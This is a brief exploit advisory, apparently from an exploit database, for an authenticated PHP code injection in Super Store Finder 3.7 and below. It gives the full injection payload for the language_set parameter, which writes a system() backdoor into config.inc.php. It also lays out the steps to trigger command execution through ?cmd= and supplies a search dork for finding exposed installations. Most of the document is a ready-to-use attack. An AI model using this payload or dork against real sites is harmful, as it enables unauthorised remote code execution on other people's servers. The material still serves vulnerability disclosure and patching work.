Share
## https://sploitus.com/exploit?id=PACKETSTORM:174756
# Vulnerability : Authenticated Arbitrary PHP Code Injection lead to Remote  
Code Execution  
# Researcher : Etharus  
# Vendor : Joe Iz, https://www.superstorefinder.net/  
# Demo Url : https://superstorefinder.net/products/superstorefinder/  
# Version Affected : 3.7 and below  
# Date : 18 September 2023  
# FOFA Dork : "designed and built by Joe Iz."  
# Step 1 : Login as user/admin  
# Step 2 : Go to Settings on right top  
# Step 3 : Turn on proxy to intercept request and save the settings  
# Step 4 : On language_set parameter set the value to  
en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//  
# Step 5 : Due to index.php called config.inc.php , we just can go for rce  
with parameter ?cmd=  
# Step 6 : Example. http://localhost/?cmd=uname%20-a